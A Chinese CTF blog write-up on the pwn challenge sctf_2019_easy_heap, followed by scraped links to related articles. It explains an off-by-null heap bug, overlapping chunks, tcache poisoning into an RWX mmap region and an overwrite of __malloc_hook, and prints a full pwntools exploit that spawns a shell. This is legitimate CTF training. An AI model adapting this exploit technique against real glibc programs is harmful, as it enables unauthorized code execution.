这个题目当时比赛的时候靶机据说是ubuntu16.04,但是迁移到buu上就变成了ubuntu18.04,下面针对两个平台给出不同的解法,先写一下18.04下的

先来逆一下,关键点有一下几个

mmap了一个可读可写可执行的内存空间,可以往里面写入shellcode,而且给了我们地址



edit函数里面有off-by-null漏洞

ubuntu18.04

我本来想直接爆破_IO_2_1_stdout_的,但是考虑到18.04下malloc的时候不会检查size,所以程序不会crash掉,当然理论也可以爆破(当p.recvuntil接受不到数据时程序会crash),但是没有去尝试,过几天试一下

现在考虑写入shellcode,然后攻击__malloc_hook

先说一下程序模板

**step 1: allocate mmap to read in shellcode**

add(0x410)  add(0x68)  add(0x4f0)  add(0x68)

free(0x410)

edit(0x68 -> off-by-null)

free(0x4f0)

add(0x410)

add(0x68)      # index 2: the same as index 1

free(0x68)      # index 3

free(0x68)       # idx 1(free) == idx 2(allocate)

free(0x68)      # idx 1(free) == idx 2(free)

add(0x68)      # index 1(allocate) == 2(free)

add(0x68)      # index 2(allocate) == 1(allocate)

add(0x68)      # mmap

**step 2: attack __malloc_hook**

add(0x4f0)

free(0x410)

edit(0x68 -> off-by-null)

free(0x68)      # index 1(free) == 2(allocate)

free(0x4f0)      #注意,这个地方必须先free 0x68,否则此后将无法通过free的检查

edit(2,'\x30')

add(0x68)     add(0x68)

edit(0x68)  to getshell

核心,利用off-by-null构造两个指向同一块chunk的指针

exp:

from pwn import *

'''

author: lemon

time: 2020-10-19

libc: libc-2.27.so

python version: python3

'''

local = 0

binary = "sctf_2019_easy_heap"

libc_path = './libc-2.27.so'

port = "27263"

if local == 1:

	p = process(binary)

else:

	p = remote("node3.buuoj.cn",port)

def dbg():

	context.log_level = 'debug'

context.terminal = ['tmux','splitw','-h']

context(arch = 'amd64',os = 'linux')

def add(size):

	p.sendlineafter('>> ','1')

	p.sendlineafter('Size: ',str(size))

def edit(index,content):

	p.sendlineafter('>> ','3')

	p.sendlineafter('Index:',str(index))

	p.sendafter('Content:',content)

def free(index):

	p.sendlineafter('>> ','2')

	p.sendlineafter('Index:',str(index))

p.recvuntil('0x')

mmap = int(p.recv(10),16)

print("[*] mmap:" + hex(mmap))

add(0x410)	#0

p.recvuntil('0x')

heap_addr = int(p.recv(12),16)

print("[*] heap array:",hex(heap_addr))

add(0x68)	# 1

add(0x4f0)	# 2

add(0x68)	# 3

payload = b'A' * 0x60 + p64(0x490)

free(0)	# free 0x410

edit(1,payload)

free(2)

add(0x410)	# 0 size: 0x410

add(0x68)	# 2 size: 0x68  2(allocate) == 1(allocate)

free(3)

free(1)

free(2)	

add(0x68)	# 1 2(free) == 1(allocate)

edit(1,p64(mmap) + b'\n')

add(0x68)	# 2 2(allocate) == 1(allocate)

add(0x68)	# 3

shellcode = asm(shellcraft.sh())

edit(3,shellcode + b'\n')

add(0x4f0)	# 4

free(0)

edit(1,payload)	# 2(allocate) == 1(allocate)

free(1)			# 1(free) == 2(allocate)

free(4)

add(0x410)	# 0

edit(2,'\x30\n')

add(0x68)	# 1(allocate) == 2(allocate)

add(0x68)	# 4 __malloc_hook

edit(4,p64(mmap) + b'\n')

add(0x20)	# getshell

# gdb.attach(p)

p.interactive()



过几天再更一下ubuntu16.04下的版本,相对于18.04,16.04利用更简单一些,甚至可以直接爆破_IO_2_1_stdout_

CTF:sctf_2019_easy_heap的更多相关文章

  1. CTF:从0到1 -> zero2one

    本篇blog首发0xffff论坛(CTF:从0到1->zero2one - 0xFFFF),中间有各位大佬补充,搬到了个人博客CTF:从0到1 -> zero2one | c10udlnk ...

  2. SECCON 2014 CTF:Shuffle

    很简单的一道小题 dia看一下是ELF文件 运行之: St0CFC}4cNOeE1WOS !eoCE{ CC T2hNto 是一串乱七八糟的字符 ida看一下: 很简单的逻辑 v5和v6是随机生成的两 ...

  3. [DEFCON全球黑客大会] CTF(Capture The Flag)

    copy : https://baike.baidu.com/item/ctf/9548546?fr=aladdin CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的 ...

  4. GitHub万星项目:黑客成长技术清单

    最近有个GitHub项目很火,叫"Awesome Hacking",这个项目是由Twitter账号@HackwithGithub 维护,喜欢逛Twitter的安全爱好者应该了解,在 ...

  5. 转:GitHub 万星推荐成长技术清单

    转:http://www.4hou.com/info/news/7061.html 最近两天,在reddit安全板块和Twitter上有个GitHub项目很火,叫“Awesome Hacking”. ...

  6. [CTF]Capture The Flag -- 夺旗赛

    CTF(Capture The Flag) 简单介绍 CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式. `In co ...

  7. GitHub 万星推荐:黑客成长技术清单

    GitHub 万星推荐:黑客成长技术清单 导语:如果你需要一些安全入门引导,“Awesome Hacking”无疑是最佳选择之一. 最近两天,在reddit安全板块和Twitter上有个GitHub项 ...

  8. 老猿学5G:3GPP和中国移动5G计费架构概览

    ☞ ░ 前往老猿Python博文目录 ░ 一.引言 老猿学5G这个专栏主要记录笔者因工作原因学习了解5G计费相关知识,文章按时间顺序循序渐进的介绍5G基础概念以及5G计费相关知识,该专栏前期已经完结, ...

  9. 老猿学5G扫盲贴:3GPP中的5G计费架构

    专栏:Python基础教程目录 专栏:使用PyQt开发图形界面Python应用 专栏:PyQt入门学习 老猿Python博文目录 老猿学5G博文目录 一.计费逻辑架构和信息流 在32240子系列文档内 ...

随机推荐

  1. 【论文】The Road to SDN: An Intellectual History of Programmable Networks

    目录 ABSTRACT: 1 Introduction: 2 The Road to SDN: 2.1 Active Networking Technology push and use pull I ...

  2. Hbuilder给手机发送短信与拨打电话

    前言:业务场景 需要给手机号码拨打电话与发送短信.html5已经提供接口. methods: { Call: function() { var that = this; if(that.ptel == ...

  3. 一篇文章带你了解Java OOP思想

    Java OOP 思想深度刨析 Java面向对象编程 面向对象编程简称OOP(Object--对象.Oriendted--导向的.Programming--程序设计) 面向对象通俗来讲,就是指使用丰富 ...

  4. GetDlgItem(函数详解)

    转载: https://blog.csdn.net/hk121/article/details/80942850 hwndScroll = GetDlgItem(hwnd, IDC_SCROLL); ...

  5. spring-boot-route(九)整合JPA操作数据库

    单调的增删改查让越来越多的程序员感到乏味,这时候就出现了很多优秀的框架,完成了对增删改查操作的封装,只需要简单配置,无需书写任何sql,就可以完成增删改查.这里比较推荐的是Spring Data Jp ...

  6. Recursive sequence (矩阵快速幂)2016ACM/ICPC亚洲区沈阳站

    题目 Farmer John likes to play mathematics games with his N cows. Recently, they are attracted by recu ...

  7. 优质分享 | Spring Boot 入门到放弃!!!

    持续原创输出,点击上方蓝字关注我 目录 前言 视频目录 如何获取? 总结 前言 最近不知不觉写Spring Boot专栏已经写了九篇文章了,从最底层的项目搭建到源码解析以及高级整合的部分,作者一直在精 ...

  8. 用c语言实现linux cat

    话不多说,直接上代码: #include <stdio.h> void file_copy(FILE * file1,FILE * file2); int main(int argc,ch ...

  9. python之多态

    python之多态 一.什么是多态? 同一种事物,有多种形态! class Animal: #同一类事物:动物 def talk(self): pass class Cat(Animal): #动物的 ...

  10. tensorflow Mobilenet 导出模型的方法

    python export_inference_graph.py --input_type image_tensor --pipeline_config_path ssd_mobilenet_v1_c ...